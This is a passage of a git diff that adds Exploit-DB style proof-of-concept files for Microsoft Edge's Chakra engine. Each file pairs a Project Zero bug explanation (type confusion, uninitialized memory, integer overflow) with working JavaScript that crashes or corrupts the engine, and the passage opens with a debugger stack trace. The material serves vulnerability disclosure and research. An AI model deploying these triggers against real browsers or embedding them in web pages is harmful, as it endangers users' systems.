+0:016> kb
+RetAddr           : Args to Child                                                           : Call Site
+00007ff9`f10fe96d : 0000015e`3d500030 0000015e`4063f9ac 00000038`8f1fbb70 0000015e`4063f9ac : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d
+00007ff9`f0f5ffb1 : 0000015e`3d500030 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x19e8fd
+00007ff9`f0ff80cc : 0000015e`3d500030 0000015e`3c7a01a0 00000038`8f1fbc30 00007ff9`f0ebc500 : chakra!Js::InterpreterStackFrame::Process+0x1b1
+00007ff9`f0ff7be1 : 0000015e`2c560600 00000038`8f1fbe10 0000015e`3c7e0fba 00000038`8f1fbe28 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
+0000015e`3c7e0fba : 00000038`8f1fbe60 0000015e`2c560600 ffffffff`fffffffe 00007ff9`f10d6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51
+00007ff9`f0e783df : 0000015e`2c560600 00000000`04000001 0000015e`2c550020 00000038`8f1fbef0 : 0x15e`3c7e0fba
+00007ff9`f0e7816a : 0000015e`3c7a01a0 0000015e`2c560600 00007ff9`f15a9f80 00000038`8f1fbef0 : chakra!Js::GlobalObject::ExecuteEvalParsedFunction+0x77
+00007ff9`f0e77fb8 : 0000015e`2c540000 00007ff9`f15a9f80 0000015e`00000000 0000015e`2c53c000 : chakra!Js::GlobalObject::VEval+0x19a
+00007ff9`f0e77ecd : 00000038`8f1fc040 0000015e`2c53b5c0 0000015e`2932a120 00000038`8f1fc000 : chakra!Js::GlobalObject::EntryEvalHelper+0xc8
+00007ff9`f10d6be3 : 0000015e`2c53b5c0 00000000`18000003 0000015e`2c550020 0000015e`2c54d770 : chakra!Js::GlobalObject::EntryEval+0x7d
+00007ff9`f0fc6bf3 : 0000015e`2932a120 00000000`00000018 00000038`8f1fc0e8 0000015e`2c53c000 : chakra!amd64_CallFunction+0x93
+00007ff9`f0e871ac : 0000015e`2c53b5c0 00007ff9`f0e77e50 00000038`8f1fc110 00000038`8f1fc2a0 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
+00007ff9`f0e877b4 : 00000038`8f1fc2a0 0000015e`3c7c0116 0000015e`2c53b5c0 00007ff9`00000008 : chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > > >+0x114
+00007ff9`f0f64920 : 00000038`8f1fc2a0 0000015e`3c7c0116 0000015e`8f1fc2a0 0000015e`3c7c0124 : chakra!Js::InterpreterStackFrame::OP_ProfiledReturnTypeCallIExtendedFlags<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > >+0x5c
+00007ff9`f0f5ff2c : 00000038`8f1fc2a0 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessProfiled+0x1250
+00007ff9`f0ff80cc : 00000038`8f1fc2a0 0000015e`3c7a0000 00000038`8f1fc4a0 00000000`00000001 : chakra!Js::InterpreterStackFrame::Process+0x12c
+00007ff9`f0ff7be1 : 0000015e`2c560480 00000038`8f1fc680 0000015e`3c7e0fc2 00000038`8f1fc698 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
+0000015e`3c7e0fc2 : 00000038`8f1fc6d0 00000000`00000000 00000000`00000000 00007ff9`f10d6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51
+00007ff9`f10d6be3 : 0000015e`2c560480 00000000`00000000 00000000`00000000 00000000`00000000 : 0x15e`3c7e0fc2
+00007ff9`f0fc6bf3 : 0000015e`2932a120 00000000`00000000 0000015e`29352a10 00007ff9`f0fda837 : chakra!amd64_CallFunction+0x93
+00007ff9`f0ff1810 : 0000015e`2c560480 00007ff9`f10d6df0 00000038`8f1fc7d0 0000015e`2932d110 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
+00007ff9`f0ff0a37 : 0000015e`2c560480 00000038`8f1fc8c0 0000015e`2932d110 00007ffa`11697100 : chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x100
+00007ff9`f10b907e : 0000015e`2c560480 00000038`8f1fc920 0000015e`2932d110 0000015e`2932da00 : chakra!Js::JavascriptFunction::CallRootFunction+0x4b
+00007ff9`f101cd54 : 0000015e`2c560480 00000038`8f1fc960 00000000`00000000 00000038`8f1fc978 : chakra!ScriptSite::CallRootFunction+0x6a
+00007ff9`f0fb1b49 : 0000015e`2932d000 0000015e`2c560480 00000038`8f1fca10 00000000`00000000 : chakra!ScriptSite::Execute+0x124
+00007ff9`f0fb2e8e : 0000015e`29329cd0 00000038`8f1fcf18 00000038`8f1fcf50 00000038`80000082 : chakra!ScriptEngine::ExecutePendingScripts+0x1a5
+00007ff9`f0fb3121 : 0000015e`29329cd0 0000015e`29ce82e4 00000000`00000000 00000156`270b4330 : chakra!ScriptEngine::ParseScriptTextCore+0x436
+00007ff9`f1a53c75 : 0000015e`29329d20 0000015e`29ce82e4 00000156`000000f1 00000000`00000000 : chakra!ScriptEngine::ParseScriptText+0xb1
+00007ff9`f1a53abe : 00000000`00000000 00000038`8f1fcde9 00000156`270b4260 00000156`00000000 : edgehtml!CJScript9Holder::ParseScriptText+0x119
+00007ff9`f1a535d7 : 00000000`00000000 00000156`270b4260 00000156`2703c1c0 00000156`270b41b0 : edgehtml!CScriptCollection::ParseScriptText+0x202
+00007ff9`f1a52f07 : 00000156`27050c01 00000156`270ac100 00000156`00000082 00007ff9`00000000 : edgehtml!CScriptData::CommitCode+0x357
+00007ff9`f1b12f8d : 00000000`ffffffff 00000156`2703c460 00000000`ffffffff 00000000`00000000 : edgehtml!CScriptData::Execute+0x20f
+00007ff9`f19543d4 : 00000000`00000000 00000156`2708c440 00000000`00000001 00007ff9`f1b0ceb9 : edgehtml!CHtmScriptParseCtx::Execute+0x7d
+00007ff9`f19534a1 : 00000156`27050c00 00000000`00000000 00000156`27050c00 00000156`2702c8c0 : edgehtml!CHtmParseBase::Execute+0x204
+00007ff9`f1b0d23b : 00000000`00026e8b 00000156`27020000 00000156`270800b0 00000156`2702c8c0 : edgehtml!CHtmPost::Exec+0x1e1
+00007ff9`f1b0d11f : 00000156`2702c8c0 00000000`00026e8b 0000015e`29ce82e0 00000000`00000000 : edgehtml!CHtmPost::Run+0x2f
+00007ff9`f1b0cfd3 : 00000156`27020000 00000000`09806f01 00000000`00000002 00000156`27061680 : edgehtml!PostManExecute+0x63
+00007ff9`f1b0ce6d : 00000156`2702c8c0 00000000`09806ff9 0000015e`00000000 00007ffa`083a4779 : edgehtml!PostManResume+0xa3
+00007ff9`f1b1b353 : 00000156`27048600 0000015e`29c26b50 00000000`00000000 00000000`00000000 : edgehtml!CHtmPost::OnDwnChanCallback+0x3d
+00007ff9`f1af50db : 00000156`270282d0 0000015e`29325463 0000015e`29302200 00000038`8f1fd4a0 : edgehtml!CDwnChan::OnMethodCall+0x23
+00007ff9`f1981706 : 0000015e`29302728 00000156`27061680 0000015e`29302260 00000038`8f1fd4d0 : edgehtml!GWndAsyncTask::Run+0x1b
+00007ff9`f1aca860 : 00000000`16389c44 00000156`270616e0 00000156`270800b0 00007ff9`f1a29138 : edgehtml!HTML5TaskScheduler::RunReadiedTask+0x236
+00007ff9`f1aca683 : 0000015e`29c26b50 00000000`00000000 00000000`00000002 00000156`27028170 : edgehtml!TaskSchedulerBase::RunReadiedTasksInTaskQueueWithCallback+0x70
+00007ff9`f19822b3 : 00000038`8f1fd980 00000000`00008002 00000156`27028170 00007ffa`10d847df : edgehtml!HTML5TaskScheduler::RunReadiedTasks+0xa3
+00007ff9`f19807a5 : 00000000`00008002 00000156`27020000 00000156`00000000 00000000`00000002 : edgehtml!NormalPriorityAtInputEventLoopDriver::DriveRegularPriorityTaskExecution+0x53
+00007ffa`10d6bc50 : 00000000`00e80380 00000000`00000001 00000000`00000002 00000000`80000012 : edgehtml!GlobalWndProc+0x125
+00007ffa`10d6b5cf : 00000156`276d4470 00007ff9`f1980680 00000000`00e80380 00000000`00e80380 : USER32!UserCallWinProcCheckWow+0x280
+00007ff9`f3686d0e : 00000038`8f1fd920 00000000`00000000 00000156`26f58170 00000000`00000000 : USER32!DispatchMessageWorker+0x19f
+00007ff9`f369eecb : 00000000`00000000 00000000`00000001 00000156`27229e70 00000156`26fd40f0 : EdgeContent!CBrowserTab::_TabWindowThreadProc+0x3ee
+00007ff9`ff58b4a8 : 00000000`00000000 00000156`27228f80 00000000`00000000 00000000`00000000 : EdgeContent!LCIETab_ThreadProc+0x2ab
+00007ffa`11a02774 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : msiso!_IsoThreadProc_WrapperToReleaseScope+0x48
+00007ffa`13770d61 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
+00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
+	
+-->
+<html>
+<head>
+<title> POC </title>
+</head>
+<script>
+
+var a=[]; 
+a.length=0xffff-1; 
+a.fill('0x42424242');
+ 
+var s='{'; 
+for(var i=0; i<0x8000-1; i++){
+ s+= 'a'+i+':0,'
+}; 
+s+= 'b:0';
+s+= '}';
+ 
+var c='function Car(){}; var car=new Car(' + a.join() + ',' + s + ')'; 
+eval(c);
+
+</script>
+</html>
\ No newline at end of file
diff --git a/platforms/windows/dos/42469.html b/platforms/windows/dos/42469.html
new file mode 100755
index 000000000..0205ef8ae
--- /dev/null
+++ b/platforms/windows/dos/42469.html
@@ -0,0 +1,48 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1271
+
+When Chakra fails to link an asmjs module, it tries to re-parse the failed-to-link asmjs function to treat it as a normal javascript function. But it incorrectly handles the case where the function is a class. It starts to parse from the start of the class declaration instead of the constructor. So it may result in binding incorrect information to the constructor. In the PoC, it binds the information of the method "f"("f2" in the latest release version of Edge) to the constructor.
+
+The PoC hits the following assertion in the debug build.
+FuncInfo * ByteCodeGenerator::StartBindFunction(const char16 *name, uint nameLength, uint shortNameOffset, bool* pfuncExprWithName, ParseNode *pnode, Js::ParseableFunctionInfo * reuseNestedFunc)
+{
+    bool funcExprWithName;
+    Js::ParseableFunctionInfo* parseableFunctionInfo = nullptr;
+
+    Js::AutoRestoreFunctionInfo autoRestoreFunctionInfo(reuseNestedFunc, reuseNestedFunc ? reuseNestedFunc->GetOriginalEntryPoint() : nullptr);
+    
+    if (this->pCurrentFunction &&
+        this->pCurrentFunction->IsFunctionParsed())
+    {
+        Assert(this->pCurrentFunction->StartInDocument() == pnode->ichMin); <<------- here
+        ...
+    }
+    ...
+}
+
+"this->pCurrentFunction" is the consturctor, but "pnode" refers to the method "f".
+
+
+PoC:
+-->
+
+class MyClass {
+    f(a) {
+        print(a);
+    }
+
+    constructor() {
+        'use asm';
+        function f(v) {
+            v = v | 0;
+            return v | 0;
+        }
+        return f;
+    }
+
+    f2(a) {
+        print(a);
+    }
+}
+
+MyClass(1);
\ No newline at end of file
diff --git a/platforms/windows/dos/42470.html b/platforms/windows/dos/42470.html
new file mode 100755
index 000000000..ac0845af3
--- /dev/null
+++ b/platforms/windows/dos/42470.html
@@ -0,0 +1,46 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1277
+
+PushPopFrameHelper is a class that pushes the current stack frame object in its constructor and pops it in the destructor. So it should be used like "PushPopFrameHelper holder(...)", but InterpreterStackFrame::ProcessLinkFailedAsmJsModule uses it like a function.
+
+Var InterpreterStackFrame::ProcessLinkFailedAsmJsModule()
+{
+    ...
+    PushPopFrameHelper(newInstance, _ReturnAddress(), _AddressOfReturnAddress());
+    ...
+}
+
+It pushes "newInstance" and immediately pop it.
+
+The PoC will crash in the following code.
+void BailOutRecord::ScheduleLoopBodyCodeGen(Js::ScriptFunction * function, Js::ScriptFunction * innerMostInlinee, BailOutRecord const * bailOutRecord, IR::BailOutKind bailOutKind)
+{
+    ...
+    Js::InterpreterStackFrame * interpreterFrame = executeFunction->GetScriptContext()->GetThreadContext()->GetLeafInterpreterFrame(); <<-- Invalid stack frame object
+    loopHeader = executeFunction->GetLoopHeader(interpreterFrame->GetCurrentLoopNum()); <<-- interpreterFrame->GetCurrentLoopNum() == -1
+    ...
+}
+
+
+PoC:
+-->
+
+function asmModule() {
+    'use asm';
+
+    let a = [1, 2, 3, 4];
+    for (let i = 0; i < 0x100000; i++) {  // JIT
+        a[0] = 1;
+        if (i === 0x30000) {
+            a[0] = {};  // the array type changed, bailout!!
+        }
+    }
+
+    function f(v) {
+        v = v | 0;
+        return v | 0;
+    }
+    return f;
+}
+
+asmModule(1);
\ No newline at end of file
diff --git a/platforms/windows/dos/42471.html b/platforms/windows/dos/42471.html
new file mode 100755
index 000000000..26ae99a95
--- /dev/null
+++ b/platforms/windows/dos/42471.html
@@ -0,0 +1,95 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1281
+
+Chakra implemented the reuse of deleted properties of an unordered dictionary object with the following code.
+
+bool SimpleDictionaryUnorderedTypeHandler::TryReuseDeletedPropertyIndex(
+    DynamicObject *const object,
+    TPropertyIndex *const propertyIndex)
+{
+    if(deletedPropertyIndex == PropertyIndexRanges<TPropertyIndex>::NoSlots)
+    {
+        return false;
+    }
+
+    *propertyIndex = deletedPropertyIndex;
+    deletedPropertyIndex = static_cast<TPropertyIndex>(TaggedInt::ToInt32(object->GetSlot(deletedPropertyIndex)));
+    return true;
+}
+
+bool SimpleDictionaryUnorderedTypeHandle::TryUndeleteProperty(
+    DynamicObject *const object,
+    const TPropertyIndex existingPropertyIndex,
+    TPropertyIndex *const propertyIndex)
+{
+    ...
+
+    if(!IsReusablePropertyIndex(existingPropertyIndex))
+    {
+        return false;
+    }
+
+    ...
+
+    const bool reused = TryReuseDeletedPropertyIndex(object, propertyIndex);
+    Assert(reused);
+
+    ...
+    return true;
+}
+
+
+BOOL SimpleDictionaryTypeHandlerBase<TPropertyIndex, TMapKey, IsNotExtensibleSupported>::SetPropertyFromDescriptor(DynamicObject* instance, PropertyId propertyId, TPropertyKey propertyKey, SimpleDictionaryPropertyDescriptor<TPropertyIndex>* descriptor, Var value, PropertyOperationFlags flags, PropertyValueInfo* info)
+{
+    ...
+    if (descriptor->Attributes & PropertyDeleted)
+    {
+        ...
+        if(isUnordered)
+        {
+            TPropertyIndex propertyIndex;
+            if(AsUnordered()->TryUndeleteProperty(instance, descriptor->propertyIndex, &propertyIndex))
+            {
+                Assert(PropertyRecordStringHashComparer<TMapKey>::Equals(propertyMap->GetKeyAt(propertyIndex), propertyRecord));
+                descriptor = propertyMap->GetReferenceAt(propertyIndex);
+            }
+        }
+
+        if (IsNotExtensibleSupported)
+        {
+            bool isForce = (flags & PropertyOperation_Force) != 0;
+            if (!isForce)
+            {
+                if (!this->VerifyIsExtensible(scriptContext, throwIfNotExtensible))
+                {
+                    return FALSE; <<------ (a)
+                }
+            }
+        }
+        ...
+        descriptor->Attributes = PropertyDynamicTypeDefaults;
+        ...
+    }
+    ...
+}
+
+"TryUndeleteProperty" is calling "TryReuseDeletedPropertyIndex" on the assumption that the return value of it is always true. But if the method exits at (a), "descriptor->Attributes" will remain with "PropertyDeleted" set, and therefore we can call "TryUndeleteProperty" again and again until "deletedPropertyIndex" becames "NoSlots" which makes "TryReuseDeletedPropertyIndex" return false.
+
+In the debug build, the PoC hits the assertion "Assert(reused);". In the release build, "propertyIndex" remains uninitialized, this will cause a memory corruption.
+
+PoC:
+-->
+
+const kNumProperties = 100;
+
+let o = {};
+for (let i = 0; i < kNumProperties; ++i)
+    o['a' + i] = i;
+
+Object.preventExtensions(o);  // IsNotExtensibleSupported && !this->VerifyIsExtensible
+
+for (let i = 0; i < kNumProperties; ++i)
+    delete o['a' + i];
+
+for (let i = 0; i < 0x1000; ++i)
+    o['a0'] = 1;  // calling TryUndeleteProperty again again
\ No newline at end of file
diff --git a/platforms/windows/dos/42472.html b/platforms/windows/dos/42472.html
new file mode 100755
index 000000000..b77e68620
--- /dev/null
+++ b/platforms/windows/dos/42472.html
@@ -0,0 +1,45 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1283
+
+"EmitAssignment" doesn't call "EmitSuperMethodBegin" that initializes the "this" register for the case when the super keyword is used. 
+
+Here's the generated bytecode for the lambda function in the PoC. R5 is uninitialized.
+Function Anonymous function ( (#1.3), #4) (In0) (size: 7 [7])
+      9 locals (1 temps from R8), 1 inline cache
+    Constant Table:
+    ======== =====
+     R1 LdRoot    
+     R2 Ld_A       (undefined)
+     R3 LdC_A_I4   int:1 
+    
+    0000   ProfiledLdEnvSlot    R6 = [1][4]  <0> 
+    000c   ProfiledLdEnvSlot    R4 = [1][3]  <1> 
+
+
+  Line  28: super.a = 1;
+  Col   13: ^
+    0018   LdHomeObjProto       R8  R4 
+    001d   ProfiledStSuperFld   R8.(this=R5) = R3 #0 <0> 
+    0025   LdUndef              R0 
+
+
+  Line  29: }
+  Col    9: ^
+    0027   Ret
+
+PoC:
+-->
+
+class Parent {
+
+};
+
+class Child extends Parent {
+    constructor() {
+        (() => {
+            super.a = 10;  // Implicitly use the "this" register. So it must be initialized.
+        })();
+    }
+};
+
+new Child();
diff --git a/platforms/windows/dos/42473.html b/platforms/windows/dos/42473.html
new file mode 100755
index 000000000..0fedfd301
--- /dev/null
+++ b/platforms/windows/dos/42473.html
@@ -0,0 +1,68 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1290
+
+I think the fix for #1045 is incorrect.
+
+Here's the original PoC.
+
+'use strict';
+
+function func(a, b, c) {
+    a[0] = 1.2;
+    b[0] = c;
+    a[1] = 2.2;
+    a[0] = 2.3023e-320;
+}
+
+function main() {
+    var a = [1.1, 2.2];
+    var b = new Uint32Array(100);
+
+    // force to optimize
+    for (var i = 0; i < 0x10000; i++)
+        func(a, b, i);
+
+    func(a, b, {valueOf: () => {
+        a[0] = {};
+
+        return 0;
+    }});
+
+    a[0].toString();
+}
+
+main();
+
+
+I just changed "var b = new Uint32Array(100);" to "var b = new Uint32Array(0);", and it worked well.
+
+PoC:
+-->
+
+'use strict';
+
+function func(a, b, c) {
+    a[0] = 1.2;
+    b[0] = c;
+    a[1] = 2.2;
+    a[0] = 2.3023e-320;
+}
+
+function main() {
+    var a = [1.1, 2.2];
+    var b = new Uint32Array(0);  // <<--------- 100 -> 0
+
+    // force to optimize
+    for (var i = 0; i < 0x10000; i++)
+        func(a, b, i);
+
+    func(a, b, {valueOf: () => {
+        a[0] = {};
+
+        return 0;
+    }});
+
+    a[0].toString();
+}
+
+main();
\ No newline at end of file
diff --git a/platforms/windows/dos/42474.html b/platforms/windows/dos/42474.html
new file mode 100755
index 000000000..789ac819c
--- /dev/null
+++ b/platforms/windows/dos/42474.html
@@ -0,0 +1,87 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1292
+
+Let's assume that the following method is called with "firstPromotedItemIsSpreadable = true", and "args" has two elements an array and an integer 0x1234 sequentially.
+In the first loop, "aItem" is an array, and "firstPromotedItemIsSpreadable" remains true because the condition for the fast path is satisfied. In the second loop, "aItem" is 0x1234 and not spreadable, but the code at (a) makes the "spreadable" variable true, thus it reaches (b) and a type confusion occurs.
+
+template<typename T>
+void JavascriptArray::ConcatArgs(RecyclableObject* pDestObj, TypeId* remoteTypeIds,
+    Js::Arguments& args, ScriptContext* scriptContext, uint start, uint startIdxDest,
+    BOOL firstPromotedItemIsSpreadable, BigIndex firstPromotedItemLength, bool spreadableCheckedAndTrue)
+{
+    JS_REENTRANCY_LOCK(jsReentLock, scriptContext->GetThreadContext());
+    JavascriptArray* pDestArray = nullptr;
+
+    if (JavascriptArray::Is(pDestObj))
+    {
+        pDestArray = JavascriptArray::FromVar(pDestObj);
+    }
+
+    T idxDest = startIdxDest;
+    for (uint idxArg = start; idxArg < args.Info.Count; idxArg++)
+    {
+        Var aItem = args[idxArg];
+        bool spreadable = spreadableCheckedAndTrue;
+        if (!spreadable && scriptContext->GetConfig()->IsES6IsConcatSpreadableEnabled())
+        {
+            // firstPromotedItemIsSpreadable is ONLY used to resume after a type promotion from uint32 to uint64
+            // we do this because calls to IsConcatSpreadable are observable (a big deal for proxies) and we don't
+            // want to do the work a second time as soon as we record the length we clear the flag.
+            JS_REENTRANT(jsReentLock, spreadable = firstPromotedItemIsSpreadable || JavascriptOperators::IsConcatSpreadable(aItem)); <<------------------------- (a)
+
+            if (!spreadable)
+            {
+                JS_REENTRANT(jsReentLock, JavascriptArray::SetConcatItem<T>(aItem, idxArg, pDestArray, pDestObj, idxDest, scriptContext));
+                ++idxDest;
+                continue;
+            }
+        }
+        else
+        {
+            spreadableCheckedAndTrue = false; // if it was `true`, reset after the first use
+        }
+
+        if (pDestArray && JavascriptArray::IsDirectAccessArray(aItem) && JavascriptArray::IsDirectAccessArray(pDestArray)
+            && BigIndex(idxDest + JavascriptArray::FromVar(aItem)->length).IsSmallIndex() && !JavascriptArray::FromVar(aItem)->IsFillFromPrototypes()) // Fast path
+        {
+            ...
+        }
+        else
+        {
+            // Flatten if other array or remote array (marked with TypeIds_Array)
+            if (DynamicObject::IsAnyArray(aItem) || remoteTypeIds[idxArg] == TypeIds_Array || spreadable)
+            {
+                <<-------------------------------------------------------------------------------------------------- (b)
+                //CONSIDER: enumerating remote array instead of walking all indices
+                BigIndex length;
+                if (firstPromotedItemIsSpreadable)
+                {
+                    firstPromotedItemIsSpreadable = false;
+                    length = firstPromotedItemLength;
+                }
+                else
+                {
+                    JS_REENTRANT(jsReentLock, length = OP_GetLength(aItem, scriptContext));
+                }
+                ...
+                RecyclableObject* itemObject = RecyclableObject::FromVar(aItem); <<----------------------- TYPE CONFUSION
+                ...
+            }
+            ...
+        }
+        ...
+    }
+}
+
+PoC:
+-->
+
+let a = [0];
+let b = [0];
+b.__defineGetter__(Symbol.isConcatSpreadable, () => {
+    b[0] = 1.2;
+    return true;
+});
+
+let res = a.concat(b, 0x1234);
+print(res);
\ No newline at end of file
diff --git a/platforms/windows/dos/42475.html b/platforms/windows/dos/42475.html
new file mode 100755
index 000000000..a2861b914
--- /dev/null
+++ b/platforms/windows/dos/42475.html
@@ -0,0 +1,58 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1295
+
+Here's the method.
+Var JavascriptFunction::EntryCall(RecyclableObject* function, CallInfo callInfo, ...)
+{
+    PROBE_STACK(function->GetScriptContext(), Js::Constants::MinStackDefault);
+
+    RUNTIME_ARGUMENTS(args, callInfo);
+    ScriptContext* scriptContext = function->GetScriptContext();
+
+    Assert(!(callInfo.Flags & CallFlags_New));
+
+    ///
+    /// Check Argument[0] has internal [[Call]] property
+    /// If not, throw TypeError
+    ///
+    if (args.Info.Count == 0 || !JavascriptConversion::IsCallable(args[0]))
+    {
+        JavascriptError::ThrowTypeError(scriptContext, JSERR_This_NeedFunction, _u("Function.prototype.call"));
+    }
+
+    RecyclableObject *pFunc = RecyclableObject::FromVar(args[0]);
+    if (args.Info.Count == 1)
+    {
+        args.Values[0] = scriptContext->GetLibrary()->GetUndefined();
+    }
+    else
+    {
+        ///
+        /// Remove function object from the arguments and pass the rest
+        ///
+        for (uint i = 0; i < args.Info.Count - 1; ++i)
+        {
+            args.Values[i] = args.Values[i + 1];
+        }
+        args.Info.Count = args.Info.Count - 1;
+    }
+
+    ///
+    /// Call the [[Call]] method on the function object
+    ///
+    return JavascriptFunction::CallFunction<true>(pFunc, pFunc->GetEntryPoint(), args);
+}
+
+Chakra uses the first value of "args.Values" as "this" and "args.Info.Count - 1" as the length of the arguments. So "args.Info.Count" must always be 1 or greater. 
+
+But the problem is that the method decrements "args.Info.Count" by one without considering the flag "CallFlags_ExtraArg". If the flag is set, the value of "args.Info.Count" will be decremented again in the next routine(ArgumentReader::AdjustArguments) because the last value of the arguments is not used as an actual argument. Therefore, the value of "args.Info.Count" becomes 0.
+
+PoC:
+-->
+
+function f() {
+    print(arguments);
+}
+
+let call = new Proxy(Function.prototype.call, {});  // proxy calls set the flag
+call.call(f);
\ No newline at end of file
diff --git a/platforms/windows/dos/42476.html b/platforms/windows/dos/42476.html
new file mode 100755
index 000000000..27ff1c315
--- /dev/null
+++ b/platforms/windows/dos/42476.html
@@ -0,0 +1,49 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1297
+
+Here's a snippet of "ParseVariableDeclaration" which is used for parsing declarations.
+template<bool buildAST>
+ParseNodePtr Parser::ParseVariableDeclaration(
+    tokens declarationType, charcount_t ichMin,
+    BOOL fAllowIn/* = TRUE*/,
+    BOOL* pfForInOk/* = nullptr*/,
+    BOOL singleDefOnly/* = FALSE*/,
+    BOOL allowInit/* = TRUE*/,
+    BOOL isTopVarParse/* = TRUE*/,
+    BOOL isFor/* = FALSE*/,
+    BOOL* nativeForOk /*= nullptr*/)
+{
+    ...
+    if (pid == wellKnownPropertyPids.arguments && m_currentNodeFunc)
+    {
+        // This var declaration may change the way an 'arguments' identifier in the function is resolved
+        if (declarationType == tkVAR)
+        {
+            m_currentNodeFunc->grfpn |= PNodeFlags::fpnArguments_varDeclaration;
+        }
+        else
+        {
+            if (GetCurrentBlockInfo()->pnodeBlock->sxBlock.blockType == Function)
+            {
+                // Only override arguments if we are at the function block level.
+                m_currentNodeFunc->grfpn |= PNodeFlags::fpnArguments_overriddenByDecl;
+            }
+        }
+    }
+    ...
+}
+
+"m_currentNodeFunc" is only replaced when "buildAST" is true. So I think it's not supposed to use "m_currentNodeFunc" when "buildAST" is false. But the above code is using it regardless of "buildAST". So it may change a wrong function's "grfpn" flag. What I noticed is the "PNodeFlags::fpnArguments_overriddenByDecl" flag which makes the function's arguments uninitialized.
+
+PoC:
+-->
+
+function f() {
+    ({a = () => {
+        let arguments;
+    }} = 1);
+
+    arguments.x;
+}
+
+f();
\ No newline at end of file
diff --git a/platforms/windows/dos/42477.html b/platforms/windows/dos/42477.html
new file mode 100755
index 000000000..b6ca6b6f1
--- /dev/null
+++ b/platforms/windows/dos/42477.html
@@ -0,0 +1,38 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1298
+
+Similar to the  issue #1297 . But this time, it happends in "Parser::ParseFncFormals" with the "PNodeFlags::fpnArguments_overriddenInParam" flag.
+
+template<bool buildAST>
+void Parser::ParseFncFormals(ParseNodePtr pnodeFnc, ParseNodePtr pnodeParentFnc, ushort flags)
+{
+    ...
+    if (IsES6DestructuringEnabled() && IsPossiblePatternStart())
+    {
+        ...
+        // Instead of passing the STFormal all the way on many methods, it seems it is better to change the symbol type afterward.
+        for (ParseNodePtr lexNode = *ppNodeLex; lexNode != nullptr; lexNode = lexNode->sxVar.pnodeNext)
+        {
+            Assert(lexNode->IsVarLetOrConst());
+            UpdateOrCheckForDuplicateInFormals(lexNode->sxVar.pid, &formals);
+            lexNode->sxVar.sym->SetSymbolType(STFormal);
+            if (m_currentNodeFunc != nullptr && lexNode->sxVar.pid == wellKnownPropertyPids.arguments)
+            {
+                m_currentNodeFunc->grfpn |= PNodeFlags::fpnArguments_overriddenInParam;  <<------ HERE
+            }
+        }
+        ...
+    ...
+}
+
+PoC:
+-->
+
+function f() {
+    ({a = ([arguments]) => {
+    }} = 1);
+
+    arguments.x;
+}
+
+f();
diff --git a/platforms/windows/dos/42478.html b/platforms/windows/dos/42478.html
new file mode 100755
index 000000000..8ffb751ae
--- /dev/null
+++ b/platforms/windows/dos/42478.html
@@ -0,0 +1,29 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1315
+
+The bytecode generator uses the "EmitNew" function to handle new operators.
+Here's the code how the function checks for integer overflow.
+void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo)
+{
+    Js::ArgSlot argCount = pnode->sxCall.argCount;
+    argCount++; // include "this"
+
+    BOOL fSideEffectArgs = FALSE;
+    unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
+    Assert(argCount == tmpCount);
+
+    if (argCount != (Js::ArgSlot)argCount)
+    {
+        Js::Throw::OutOfMemory();
+    }
+    ...
+}
+
+"Js::ArgSlot" is a 16 bit unsigned integer type. And "argCount" is of the type "Js::ArgSlot". So "if (argCount != (Js::ArgSlot)argCount)" has no point. It can't prevent the integer overflow at all.
+
+PoC:
+-->
+
+let args = new Array(0x10000);
+args = args.fill(0x1234).join(', ');
+eval('new Array(' + args + ')');
\ No newline at end of file
diff --git a/platforms/windows/dos/42479.html b/platforms/windows/dos/42479.html
new file mode 100755
index 000000000..fc032eca4
--- /dev/null
+++ b/platforms/windows/dos/42479.html
@@ -0,0 +1,38 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1316
+
+Coincidentally, Microsoft released the patch for the  issue 1290  the day after I reported it. But it seems they fixed it incorrectly again.
+
+This time, "func(a, b, i);" is replaced with "func(a, b, {});".
+
+PoC:
+-->
+
+'use strict';
+
+function func(a, b, c) {
+    a[0] = 1.2;
+    b[0] = c;
+    a[1] = 2.2;
+    a[0] = 2.3023e-320;
+}
+
+function main() {
+    let a = [1.1, 2.2];
+    let b = new Uint32Array(100);
+
+    for (let i = 0; i < 0x1000; i++)
+        func(a, b, {});  // <<---------- REPLACED
+
+    func(a, b, {valueOf: () => {
+        a[0] = {};
+
+        return 0;
+    }});
+
+    a[0].toString();
+}
+
+main();
+
+// Tested on Microsoft Edge 40.15063.0.0(Insider Preview).
\ No newline at end of file
